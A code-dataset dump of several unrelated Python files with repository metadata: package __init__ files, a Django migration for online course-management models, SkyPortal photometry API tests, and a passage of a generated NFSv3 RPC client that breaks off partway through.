| avg_line_length 36.096033 | max_line_length 109 | alphanum_fraction 0.586177 | num_words 4,388 | num_chars 34,580 | … remaining per-file quality-signal columns elided … |

hexsha 825ee8dee2685e1a1d26a3256617cc93b2781f35 | size 44 | ext py | lang Python | path tensortrade/env/__init__.py | repo nicomon24/tensortrade @ 870ae06a4440045edde4f5306e64264bd33d5b67 | licenses ["Apache-2.0"] | stars 3,081 (2020-01-12T13:42:13Z to 2022-03-27T18:09:31Z) | issues 257 (2020-01-15T03:14:29Z to 2022-03-31T04:19:14Z) | forks 804 (2020-01-12T12:22:22Z to 2022-03-28T13:41:59Z) |
from . import generic
from . import default
| avg_line_length 14.666667 | max_line_length 21 | alphanum_fraction 0.772727 | num_words 6 | num_chars 44 | … remaining per-file quality-signal columns elided … |

hexsha 8288872c00211c25184a0d8503e218e8fb7cf803 | size 10,831 | ext py | lang Python | path FusionIIIT/applications/online_cms/migrations/0001_initial.py | repo ssaksham9/Fusion @ f1e405b457dba399411a2ddb79a9068746c05057 | licenses ["bzip2-1.0.6"] | stars 2 (2020-01-24T16:34:54Z to 2020-08-01T05:09:24Z) | issues 19 (2019-09-08T06:01:14Z to 2020-05-21T09:08:20Z) | forks 14 (2019-08-31T12:25:42Z to 2022-01-12T08:05:33Z) |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.25 on 2019-10-31 23:56
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('globals', '0003_auto_20191024_1242'),
('academic_information', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Assignment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('upload_time', models.DateTimeField(auto_now=True)),
('submit_date', models.DateTimeField()),
('assignment_name', models.CharField(max_length=100)),
('assignment_url', models.CharField(max_length=100, null=True)),
('course_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='academic_information.Course')),
],
),
migrations.CreateModel(
name='CourseDocuments',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('upload_time', models.DateTimeField(auto_now=True)),
('description', models.CharField(max_length=100)),
('document_name', models.CharField(max_length=40)),
('document_url', models.CharField(max_length=100, null=True)),
('course_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='academic_information.Course')),
],
),
migrations.CreateModel(
name='CourseVideo',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('upload_time', models.DateTimeField(auto_now=True)),
('description', models.CharField(max_length=100)),
('video_name', models.CharField(max_length=40)),
('video_url', models.CharField(max_length=100, null=True)),
('course_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='academic_information.Course')),
],
),
migrations.CreateModel(
name='Forum',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('comment_time', models.DateTimeField(auto_now=True)),
('comment', models.TextField(max_length=2000)),
('commenter_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='globals.ExtraInfo')),
('course_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='academic_information.Course')),
],
),
migrations.CreateModel(
name='ForumReply',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('forum_ques', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='forum_ques', to='online_cms.Forum')),
('forum_reply', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='forum_reply', to='online_cms.Forum')),
],
),
migrations.CreateModel(
name='Practice',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('prac_quiz_name', models.CharField(max_length=20)),
('negative_marks', models.FloatField(default=0)),
('number_of_question', models.IntegerField(default=0)),
('description', models.TextField(max_length=1000)),
('total_score', models.IntegerField(default=0)),
('course_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='academic_information.Course')),
],
),
migrations.CreateModel(
name='PracticeQuestion',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('question', models.TextField(max_length=1000)),
('options1', models.CharField(max_length=100, null=True)),
('options2', models.CharField(max_length=100, null=True)),
('options3', models.CharField(max_length=100, null=True)),
('options4', models.CharField(max_length=100, null=True)),
('options5', models.CharField(max_length=100, null=True)),
('answer', models.IntegerField()),
('image', models.TextField(max_length=1000, null=True)),
('prac_quiz_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='online_cms.Practice')),
],
),
migrations.CreateModel(
name='Question',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('question', models.TextField(max_length=1000)),
('options1', models.CharField(max_length=100, null=True)),
('options2', models.CharField(max_length=100, null=True)),
('options3', models.CharField(max_length=100, null=True)),
('options4', models.CharField(max_length=100, null=True)),
('options5', models.CharField(max_length=100, null=True)),
('answer', models.IntegerField()),
('image', models.TextField(max_length=1000, null=True)),
('marks', models.IntegerField()),
],
),
migrations.CreateModel(
name='QuestionBank',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100)),
('course_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='academic_information.Course')),
('instructor_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='globals.ExtraInfo')),
],
),
migrations.CreateModel(
name='Quiz',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('quiz_name', models.CharField(max_length=20)),
('end_time', models.DateTimeField()),
('start_time', models.DateTimeField()),
('d_day', models.CharField(max_length=2)),
('d_hour', models.CharField(max_length=2)),
('d_minute', models.CharField(max_length=2)),
('negative_marks', models.FloatField(default=0)),
('number_of_question', models.IntegerField(default=0)),
('description', models.TextField(max_length=1000)),
('rules', models.TextField(max_length=2000)),
('total_score', models.IntegerField(default=0)),
('course_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='academic_information.Course')),
],
),
migrations.CreateModel(
name='QuizQuestion',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('question', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='online_cms.Question')),
('quiz_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='online_cms.Quiz')),
],
),
migrations.CreateModel(
name='QuizResult',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('score', models.IntegerField()),
('finished', models.BooleanField(default=False)),
('quiz_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='online_cms.Quiz')),
('student_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='academic_information.Student')),
],
),
migrations.CreateModel(
name='StudentAnswer',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('choice', models.IntegerField()),
('question_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='online_cms.QuizQuestion')),
('quiz_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='online_cms.Quiz')),
('student_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='academic_information.Student')),
],
),
migrations.CreateModel(
name='StudentAssignment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('upload_time', models.DateTimeField(auto_now=True)),
('upload_url', models.TextField(max_length=200)),
('score', models.IntegerField(null=True)),
('feedback', models.CharField(max_length=100, null=True)),
('assign_name', models.CharField(max_length=100)),
('assignment_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='online_cms.Assignment')),
('student_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='academic_information.Student')),
],
),
migrations.CreateModel(
name='Topics',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('topic_name', models.TextField(max_length=200)),
('course_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='academic_information.Course')),
],
),
migrations.AddField(
model_name='question',
name='question_bank',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='online_cms.QuestionBank'),
),
migrations.AddField(
model_name='question',
name='topic',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='online_cms.Topics'),
),
]
| avg_line_length 54.427136 | max_line_length 147 | alphanum_fraction 0.593574 | num_words 1,085 | num_chars 10,831 | … remaining per-file quality-signal columns elided … |

hexsha 82a3e590dc05e9268ca8fb9e62db09304e4be169 | size 179 | ext py | lang Python | path fargatespawner/__init__.py | repo dadoeyad/fargatespawner @ df13e7ce003e79658379254909e24f81f6437225 | licenses ["MIT"] | stars null | issues null | forks null |
from .fargatespawner import FargateSpawner
from .fargatespawner import FargateSpawnerSecretAccessKeyAuthentication
from .fargatespawner import FargateSpawnerECSRoleAuthentication
| avg_line_length 44.75 | max_line_length 71 | alphanum_fraction 0.916201 | num_words 12 | num_chars 179 | … remaining per-file quality-signal columns elided … |

hexsha 82b49177427c56d783ac1e21e0865848bba9827a | size 22,058 | ext py | lang Python | path skyportal/tests/api/test_photometry.py | repo jialin-wu-02/skyportal @ 29d606ad8567b2230fb0553b18dd3cb9d3ab2d84 | licenses ["BSD-3-Clause"] | stars null | issues 156 (2019-10-17T19:35:22Z to 2021-08-01T13:23:47Z) | forks null |
import os
import datetime
import base64
from skyportal.tests import api
from skyportal.models import Thumbnail, DBSession, Photometry
import numpy as np
import sncosmo
def test_token_user_post_get_photometry_data(upload_data_token, public_source,
ztf_camera):
status, data = api('POST', 'photometry',
data={'obj_id': str(public_source.id),
'mjd': 58000.,
'instrument_id': ztf_camera.id,
'flux': 12.24,
'fluxerr': 0.031,
'zp': 25.,
'magsys': 'ab',
'filter': 'ztfg'
},
token=upload_data_token)
assert status == 200
assert data['status'] == 'success'
photometry_id = data['data']['ids'][0]
status, data = api(
'GET',
f'photometry/{photometry_id}?format=flux',
token=upload_data_token)
assert status == 200
assert data['status'] == 'success'
assert data['data']['ra'] is None
assert data['data']['dec'] is None
assert data['data']['ra_unc'] is None
assert data['data']['dec_unc'] is None
np.testing.assert_allclose(data['data']['flux'],
12.24 * 10**(-0.4 * (25. - 23.9)))
def test_token_user_post_mag_photometry_data_and_convert(upload_data_token,
public_source,
ztf_camera):
status, data = api('POST', 'photometry',
data={'obj_id': str(public_source.id),
'mjd': 58000.,
'instrument_id': ztf_camera.id,
'mag': 21.,
'magerr': 0.2,
'limiting_mag': 22.3,
'magsys': 'vega',
'filter': 'ztfg'
},
token=upload_data_token)
assert status == 200
assert data['status'] == 'success'
photometry_id = data['data']['ids'][0]
status, data = api(
'GET',
f'photometry/{photometry_id}?format=flux',
token=upload_data_token)
assert status == 200
assert data['status'] == 'success'
ab = sncosmo.get_magsystem('ab')
vega = sncosmo.get_magsystem('vega')
correction = 2.5 * np.log10(vega.zpbandflux('ztfg') / ab.zpbandflux('ztfg'))
np.testing.assert_allclose(data['data']['flux'],
10**(-0.4 * (21. - correction - 23.9 )))
np.testing.assert_allclose(data['data']['fluxerr'],
0.2 / (2.5 / np.log(10)) * data['data']['flux'])
status, data = api(
'GET',
f'photometry/{photometry_id}',
token=upload_data_token)
assert status == 200
assert data['status'] == 'success'
np.testing.assert_allclose(data['data']['mag'],
21. - correction)
np.testing.assert_allclose(data['data']['magerr'],
0.2)
def test_token_user_post_and_get_different_systems_mag(upload_data_token,
public_source,
ztf_camera):
status, data = api('POST', 'photometry',
data={'obj_id': str(public_source.id),
'mjd': 58000.,
'instrument_id': ztf_camera.id,
'mag': 21.,
'magerr': 0.2,
'limiting_mag': 22.3,
'magsys': 'vega',
'filter': 'ztfg'
},
token=upload_data_token)
assert status == 200
assert data['status'] == 'success'
photometry_id = data['data']['ids'][0]
status, data = api(
'GET',
f'photometry/{photometry_id}?format=mag&magsys=vega',
token=upload_data_token)
assert status == 200
assert data['status'] == 'success'
ab = sncosmo.get_magsystem('ab')
vega = sncosmo.get_magsystem('vega')
correction = 2.5 * np.log10(vega.zpbandflux('ztfg') / ab.zpbandflux('ztfg'))
np.testing.assert_allclose(data['data']['mag'], 21.)
np.testing.assert_allclose(data['data']['magerr'], 0.2)
np.testing.assert_allclose(data['data']['limiting_mag'], 22.3)
status, data = api(
'GET',
f'photometry/{photometry_id}?format=mag&magsys=ab',
token=upload_data_token)
assert status == 200
assert data['status'] == 'success'
np.testing.assert_allclose(data['data']['mag'], 21. - correction)
np.testing.assert_allclose(data['data']['magerr'], 0.2)
np.testing.assert_allclose(data['data']['limiting_mag'], 22.3 - correction)
def test_token_user_post_and_get_different_systems_flux(upload_data_token,
public_source,
ztf_camera):
status, data = api('POST', 'photometry',
data={'obj_id': str(public_source.id),
'mjd': 58000.,
'instrument_id': ztf_camera.id,
'mag': 21.,
'magerr': 0.2,
'limiting_mag': 22.3,
'magsys': 'vega',
'filter': 'ztfg'
},
token=upload_data_token)
assert status == 200
assert data['status'] == 'success'
photometry_id = data['data']['ids'][0]
status, data = api(
'GET',
f'photometry/{photometry_id}?format=flux&magsys=vega',
token=upload_data_token)
assert status == 200
assert data['status'] == 'success'
ab = sncosmo.get_magsystem('ab')
vega = sncosmo.get_magsystem('vega')
correction = 2.5 * np.log10(vega.zpbandflux('ztfg') / ab.zpbandflux('ztfg'))
np.testing.assert_allclose(data['data']['flux'], 10**(-0.4 * (21 - correction - 23.9)))
np.testing.assert_allclose(data['data']['fluxerr'], 0.2 / (2.5 / np.log(10)) * data['data']['flux'])
np.testing.assert_allclose(data['data']['zp'], 23.9 + correction)
status, data = api(
'GET',
f'photometry/{photometry_id}?format=flux&magsys=ab',
token=upload_data_token)
assert status == 200
assert data['status'] == 'success'
np.testing.assert_allclose(data['data']['flux'], 10**(-0.4 * (21 - correction - 23.9)))
np.testing.assert_allclose(data['data']['fluxerr'], 0.2 / (2.5 / np.log(10)) * data['data']['flux'])
np.testing.assert_allclose(data['data']['zp'], 23.9)
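# Illustrative helpers (not used by the tests; added only to spell out the
# convention the assertions above rely on): the endpoint normalizes to the
# AB system with zp = 23.9, i.e. flux in microjansky, and the flux error
# follows first-order propagation of the magnitude error.
def _mag_to_flux(mag, zp=23.9):
    # mag = -2.5 * log10(flux) + zp  =>  flux = 10 ** (-0.4 * (mag - zp))
    return 10 ** (-0.4 * (mag - zp))


def _magerr_to_fluxerr(magerr, flux):
    # fluxerr = magerr / (2.5 / ln 10) * flux
    return magerr / (2.5 / np.log(10)) * flux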
def test_token_user_mixed_photometry_post(upload_data_token, public_source,
ztf_camera):
status, data = api('POST', 'photometry',
data={'obj_id': str(public_source.id),
'mjd': 58000.,
'instrument_id': ztf_camera.id,
'mag': 21.,
'magerr': [0.2, 0.1],
'limiting_mag': 22.3,
'magsys': 'ab',
'filter': 'ztfg'
},
token=upload_data_token)
assert status == 200
assert data['status'] == 'success'
photometry_id = data['data']['ids'][1]
status, data = api(
'GET',
f'photometry/{photometry_id}?format=flux',
token=upload_data_token)
assert status == 200
assert data['status'] == 'success'
np.testing.assert_allclose(data['data']['flux'],
10**(-0.4 * (21. - 23.9 )))
np.testing.assert_allclose(data['data']['fluxerr'],
0.1 / (2.5 / np.log(10)) * data['data']['flux'])
# should fail as len(mag) != len(magerr)
status, data = api('POST', 'photometry',
data={'obj_id': str(public_source.id),
'mjd': 58000.,
'instrument_id': ztf_camera.id,
'mag': [21.],
'magerr': [0.2, 0.1],
'limiting_mag': 22.3,
'magsys': 'ab',
'filter': 'ztfg'
},
token=upload_data_token)
assert status == 400
assert data['status'] == 'error'
def test_token_user_mixed_mag_none_photometry_post(upload_data_token, public_source,
ztf_camera):
status, data = api('POST', 'photometry',
data={'obj_id': str(public_source.id),
'mjd': 58000.,
'instrument_id': ztf_camera.id,
'mag': None,
'magerr': [0.2, 0.1],
'limiting_mag': 22.3,
'magsys': 'ab',
'filter': 'ztfg'
},
token=upload_data_token)
assert status == 400
assert data['status'] == 'error'
status, data = api('POST', 'photometry',
data={'obj_id': str(public_source.id),
'mjd': 58000.,
'instrument_id': ztf_camera.id,
'mag': [21.3, None],
'magerr': [0.2, 0.1],
'limiting_mag': 22.3,
'magsys': 'ab',
'filter': 'ztfg'
},
token=upload_data_token)
assert status == 400
assert data['status'] == 'error'
status, data = api('POST', 'photometry',
data={'obj_id': str(public_source.id),
'mjd': 58000.,
'instrument_id': ztf_camera.id,
'mag': [21.3, None],
'magerr': [None, 0.1],
'limiting_mag': 22.3,
'magsys': 'ab',
'filter': 'ztfg'
},
token=upload_data_token)
assert status == 400
assert data['status'] == 'error'
def test_token_user_post_photometry_limits(upload_data_token, public_source,
ztf_camera):
status, data = api('POST', 'photometry',
data={'obj_id': str(public_source.id),
'mjd': 58000.,
'instrument_id': ztf_camera.id,
'mag': None,
'magerr': None,
'limiting_mag': 22.3,
'magsys': 'ab',
'filter': 'ztfg'
},
token=upload_data_token)
assert status == 200
assert data['status'] == 'success'
photometry_id = data['data']['ids'][0]
status, data = api(
'GET',
f'photometry/{photometry_id}?format=flux',
token=upload_data_token)
assert status == 200
assert data['status'] == 'success'
    assert data['data']['flux'] is None
np.testing.assert_allclose(data['data']['fluxerr'],
10**(-0.4 * (22.3 - 23.9)) / 5)
status, data = api('POST', 'photometry',
data={'obj_id': str(public_source.id),
'mjd': 58000.,
'instrument_id': ztf_camera.id,
'flux': None,
'fluxerr': 0.031,
'zp': 25.,
'magsys': 'ab',
'filter': 'ztfg'
},
token=upload_data_token)
assert status == 200
assert data['status'] == 'success'
photometry_id = data['data']['ids'][0]
status, data = api(
'GET',
f'photometry/{photometry_id}?format=flux',
token=upload_data_token)
assert status == 200
assert data['status'] == 'success'
    assert data['data']['flux'] is None
np.testing.assert_allclose(data['data']['fluxerr'],
0.031 * 10**(-0.4 * (25. - 23.9)))
def test_token_user_post_invalid_filter(upload_data_token, public_source,
ztf_camera):
status, data = api('POST', 'photometry',
data={'obj_id': str(public_source.id),
'mjd': 58000.,
'instrument_id': ztf_camera.id,
'mag': None,
'magerr': None,
'limiting_mag': 22.3,
'magsys': 'ab',
'filter': 'bessellv'
},
token=upload_data_token)
assert status == 400
assert data['status'] == 'error'
def test_token_user_post_photometry_data_series(upload_data_token, public_source,
ztf_camera):
# valid request
status, data = api(
'POST',
'photometry',
data={'obj_id': str(public_source.id),
'mjd': [58000., 58001., 58002.],
'instrument_id': ztf_camera.id,
'flux': [12.24, 15.24, 12.24],
'fluxerr': [0.031, 0.029, 0.030],
'filter': ['ztfg', 'ztfg', 'ztfg'],
'zp': [25., 30., 21.2],
'magsys': ['ab', 'ab', 'ab'],
'ra': 264.1947917,
'dec': [50.5478333, 50.5478333 + 0.00001, 50.5478333],
'dec_unc': 0.2},
token=upload_data_token)
assert status == 200
assert data['status'] == 'success'
assert len(data['data']['ids']) == 3
photometry_id = data['data']['ids'][1]
status, data = api(
'GET',
f'photometry/{photometry_id}?format=flux',
token=upload_data_token)
assert status == 200
assert data['status'] == 'success'
assert np.allclose(data['data']['flux'],
15.24 * 10**(-0.4 * (30 - 23.9)))
assert np.allclose(data['data']['dec'],
50.5478333 + 0.00001)
assert np.allclose(data['data']['dec_unc'], 0.2)
assert data['data']['ra_unc'] is None
# invalid request
status, data = api(
'POST',
'photometry',
data=[{'obj_id': str(public_source.id),
'mjd': 58000,
'instrument_id': ztf_camera.id,
'flux': 12.24,
'fluxerr': 0.031,
'filter': 'ztfg',
'zp': 25.,
'magsys': 'ab'},
{'obj_id': str(public_source.id),
'mjd': 58001,
'instrument_id': ztf_camera.id,
'flux': 15.24,
'fluxerr': 0.031,
'filter': 'ztfg',
'zp': 30.,
'magsys': 'ab'},
{'obj_id': str(public_source.id),
'mjd': 58002,
'instrument_id': ztf_camera.id,
'flux': 12.24,
'fluxerr': 0.031,
'filter': 'ztfg',
'zp': 21.2,
'magsys': 'vega'}],
token=upload_data_token)
assert status == 400
assert data['status'] == 'error'
def test_post_photometry_no_access_token(view_only_token, public_source,
ztf_camera):
status, data = api('POST', 'photometry',
data={'obj_id': str(public_source.id),
'mjd': 58000.,
'instrument_id': ztf_camera.id,
'flux': 12.24,
'fluxerr': 0.031,
'zp': 25.,
'magsys': 'ab',
'filter': 'ztfg'
},
token=view_only_token)
assert status == 400
assert data['status'] == 'error'
def test_token_user_update_photometry(upload_data_token,
manage_sources_token,
public_source, ztf_camera):
status, data = api('POST', 'photometry',
data={'obj_id': str(public_source.id),
'mjd': 58000.,
'instrument_id': ztf_camera.id,
'flux': 12.24,
'fluxerr': 0.031,
'zp': 25.,
'magsys': 'ab',
'filter': 'ztfi'
},
token=upload_data_token)
assert status == 200
assert data['status'] == 'success'
photometry_id = data['data']['ids'][0]
status, data = api(
'GET',
f'photometry/{photometry_id}?format=flux',
token=upload_data_token)
assert status == 200
assert data['status'] == 'success'
np.testing.assert_allclose(data['data']['flux'],
12.24 * 10**(-0.4 * (25 - 23.9)))
status, data = api(
'PUT',
f'photometry/{photometry_id}',
data={'obj_id': str(public_source.id),
'flux': 11.0,
'mjd': 58000.,
'instrument_id': ztf_camera.id,
'fluxerr': 0.031,
'zp': 25.,
'magsys': 'ab',
'filter': 'ztfi'},
token=manage_sources_token)
assert status == 200
assert data['status'] == 'success'
status, data = api(
'GET',
f'photometry/{photometry_id}?format=flux',
token=upload_data_token)
np.testing.assert_allclose(data['data']['flux'],
11.0 * 10**(-0.4 * (25 - 23.9)))
def test_delete_photometry_data(upload_data_token, manage_sources_token,
public_source, ztf_camera):
status, data = api('POST', 'photometry',
data={'obj_id': str(public_source.id),
'mjd': 58000.,
'instrument_id': ztf_camera.id,
'flux': 12.24,
'fluxerr': 0.031,
'zp': 25.,
'magsys': 'ab',
'filter': 'ztfi'
},
token=upload_data_token)
assert status == 200
assert data['status'] == 'success'
photometry_id = data['data']['ids'][0]
status, data = api(
'GET',
f'photometry/{photometry_id}?format=flux',
token=upload_data_token)
assert status == 200
assert data['status'] == 'success'
np.testing.assert_allclose(data['data']['flux'],
12.24 * 10 ** (-0.4 * (25 - 23.9)))
status, data = api(
'DELETE',
f'photometry/{photometry_id}',
token=manage_sources_token)
assert status == 200
status, data = api(
'GET',
f'photometry/{photometry_id}?format=flux',
token=upload_data_token)
assert status == 400
def test_token_user_retrieving_source_photometry_and_convert(view_only_token, public_source):
status, data = api('GET', f'sources/{public_source.id}/photometry?format=flux&magsys=ab',
token=view_only_token)
assert status == 200
assert data['status'] == 'success'
assert isinstance(data['data'], list)
assert 'mjd' in data['data'][0]
assert 'ra_unc' in data['data'][0]
mag1_ab = -2.5 * np.log10(data['data'][0]['flux']) + data['data'][0]['zp']
magerr1_ab = 2.5 / np.log(10) * data['data'][0]['fluxerr']/ data['data'][0]['flux']
maglast_ab = -2.5 * np.log10(data['data'][-1]['flux']) + data['data'][-1]['zp']
magerrlast_ab = 2.5 / np.log(10) * data['data'][-1]['fluxerr']/ data['data'][-1]['flux']
status, data = api('GET', f'sources/{public_source.id}/photometry?format=mag&magsys=ab',
token=view_only_token)
assert status == 200
assert data['status'] == 'success'
assert np.allclose(mag1_ab, data['data'][0]['mag'])
assert np.allclose(magerr1_ab, data['data'][0]['magerr'])
assert np.allclose(maglast_ab, data['data'][-1]['mag'])
assert np.allclose(magerrlast_ab, data['data'][-1]['magerr'])
status, data = api('GET', f'sources/{public_source.id}/photometry?format=flux&magsys=vega',
token=view_only_token)
mag1_vega = -2.5 * np.log10(data['data'][0]['flux']) + data['data'][0]['zp']
magerr1_vega = 2.5 / np.log(10) * data['data'][0]['fluxerr']/ data['data'][0]['flux']
maglast_vega = -2.5 * np.log10(data['data'][-1]['flux']) + data['data'][-1]['zp']
magerrlast_vega = 2.5 / np.log(10) * data['data'][-1]['fluxerr']/ data['data'][-1]['flux']
assert status == 200
assert data['status'] == 'success'
ab = sncosmo.get_magsystem('ab')
vega = sncosmo.get_magsystem('vega')
vega_to_ab = {
filter: 2.5 * np.log10(ab.zpbandflux(filter) / vega.zpbandflux(filter))
for filter in ['ztfg', 'ztfr', 'ztfi']
}
assert np.allclose(mag1_ab, mag1_vega + vega_to_ab[data['data'][0]['filter']])
assert np.allclose(magerr1_ab, magerr1_vega)
assert np.allclose(maglast_ab, maglast_vega + vega_to_ab[data['data'][-1]['filter']])
assert np.allclose(magerrlast_ab, magerrlast_vega)
| avg_line_length 37.705983 | max_line_length 104 | alphanum_fraction 0.4621 | num_words 2,249 | num_chars 22,058 | … remaining per-file quality-signal columns elided … |

hexsha 7dd2bdc0ffd41f6e47e6df1b712d42877e74b38e | size 44,668 | ext py | lang Python | path src/goose_lang/examples/nfs_spec/symtest/rfc1813/client.py | repo herbelin/perennial @ 49b044fa83b4df2dc23262571e79c1165006bdc8 | licenses ["MIT"] | stars 73 (2019-09-24T14:50:57Z to 2022-03-25T02:01:55Z) | issues 39 (2020-01-31T19:08:09Z to 2022-01-14T15:46:56Z) | forks 17 (2020-01-22T14:49:13Z to 2021-11-26T18:38:48Z) |
# Generated by rpcgen.py from /home/nickolai/proj/go-rpcgen/rfc1813/prot.x on Fri Dec 6 10:47:13 2019
import rpc
import const
import pack
class NFS_PROGRAM(object):
class RawTCPNFS_V3(rpc.RawTCPClient):
def __init__(self, host, port, **kwargs):
if 'program' in kwargs or 'version' in kwargs:
raise TypeError('Unexpected keyword argument')
rpc.RawTCPClient.__init__(self, host, port, program=const.NFS_PROGRAM, version=const.NFS_V3, **kwargs)
# void NFSPROC3_NULL(void)
def NFSPROC3_NULL(self):
procedure_id = 0
self.call(procedure_id, '')
return None
# GETATTR3res NFSPROC3_GETATTR(GETATTR3args)
def NFSPROC3_GETATTR(self, p0):
procedure_id = 1
packer = pack.protPacker()
packer.pack_GETATTR3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_GETATTR3res()
unpacker.done()
return res
# SETATTR3res NFSPROC3_SETATTR(SETATTR3args)
def NFSPROC3_SETATTR(self, p0):
procedure_id = 2
packer = pack.protPacker()
packer.pack_SETATTR3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_SETATTR3res()
unpacker.done()
return res
# LOOKUP3res NFSPROC3_LOOKUP(LOOKUP3args)
def NFSPROC3_LOOKUP(self, p0):
procedure_id = 3
packer = pack.protPacker()
packer.pack_LOOKUP3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_LOOKUP3res()
unpacker.done()
return res
# ACCESS3res NFSPROC3_ACCESS(ACCESS3args)
def NFSPROC3_ACCESS(self, p0):
procedure_id = 4
packer = pack.protPacker()
packer.pack_ACCESS3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_ACCESS3res()
unpacker.done()
return res
# READLINK3res NFSPROC3_READLINK(READLINK3args)
def NFSPROC3_READLINK(self, p0):
procedure_id = 5
packer = pack.protPacker()
packer.pack_READLINK3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_READLINK3res()
unpacker.done()
return res
# READ3res NFSPROC3_READ(READ3args)
def NFSPROC3_READ(self, p0):
procedure_id = 6
packer = pack.protPacker()
packer.pack_READ3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_READ3res()
unpacker.done()
return res
# WRITE3res NFSPROC3_WRITE(WRITE3args)
def NFSPROC3_WRITE(self, p0):
procedure_id = 7
packer = pack.protPacker()
packer.pack_WRITE3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_WRITE3res()
unpacker.done()
return res
# CREATE3res NFSPROC3_CREATE(CREATE3args)
def NFSPROC3_CREATE(self, p0):
procedure_id = 8
packer = pack.protPacker()
packer.pack_CREATE3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_CREATE3res()
unpacker.done()
return res
# MKDIR3res NFSPROC3_MKDIR(MKDIR3args)
def NFSPROC3_MKDIR(self, p0):
procedure_id = 9
packer = pack.protPacker()
packer.pack_MKDIR3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_MKDIR3res()
unpacker.done()
return res
# SYMLINK3res NFSPROC3_SYMLINK(SYMLINK3args)
def NFSPROC3_SYMLINK(self, p0):
procedure_id = 10
packer = pack.protPacker()
packer.pack_SYMLINK3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_SYMLINK3res()
unpacker.done()
return res
# MKNOD3res NFSPROC3_MKNOD(MKNOD3args)
def NFSPROC3_MKNOD(self, p0):
procedure_id = 11
packer = pack.protPacker()
packer.pack_MKNOD3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_MKNOD3res()
unpacker.done()
return res
# REMOVE3res NFSPROC3_REMOVE(REMOVE3args)
def NFSPROC3_REMOVE(self, p0):
procedure_id = 12
packer = pack.protPacker()
packer.pack_REMOVE3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_REMOVE3res()
unpacker.done()
return res
# RMDIR3res NFSPROC3_RMDIR(RMDIR3args)
def NFSPROC3_RMDIR(self, p0):
procedure_id = 13
packer = pack.protPacker()
packer.pack_RMDIR3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_RMDIR3res()
unpacker.done()
return res
# RENAME3res NFSPROC3_RENAME(RENAME3args)
def NFSPROC3_RENAME(self, p0):
